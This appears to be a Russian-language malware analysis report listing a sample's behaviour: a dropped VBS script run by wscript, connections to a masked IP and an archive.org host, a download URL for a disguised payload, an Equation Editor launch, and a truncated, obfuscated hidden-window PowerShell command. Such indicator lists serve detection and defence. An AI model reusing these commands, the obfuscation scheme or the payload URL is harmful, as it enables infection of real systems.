Техническая информация
- '%WINDIR%\syswow64\wscript.exe' "%APPDATA%\mugcackecholocatebutterburnm.vBS"
- %APPDATA%\mugcackecholocatebutterburnm.vbs
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\i3nmat9z\config14[1].txt
- '45.#0.89.50':80
- 'ia#####4.us.archive.org':443
- http://45.#0.89.50/224/mugcackecholocatebutterburnmix.tIF
- 'ia#####4.us.archive.org':443
- DNS ASK ia#####4.us.archive.org
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -command $Codigo = 'J∽ Вґ ⺴ ⎰ ⪤Bp∽ Вґ ⺴ ⎰ ⪤G0∽ Вґ ⺴ ⎰ ⪤YQBn∽ Вґ ⺴ ⎰ ⪤GU∽ Вґ ⺴ ⎰ ⪤VQBy∽ Вґ ⺴ ⎰ ⪤Gw∽ Вґ ⺴ ⎰ ⪤I∽ Вґ ⺴ ⎰ ⪤∽ Вґ ⺴ ⎰ ⪤9∽ Вґ ⺴ ⎰ ⪤C∽ Вґ ⺴ ⎰ ⪤∽ Вґ ⺴ ⎰ ⪤JwBo∽ Вґ ⺴ ⎰ ⪤HQ∽ Вґ ⺴ ⎰ ⪤d∽ Вґ ⺴... (со скрытым окном)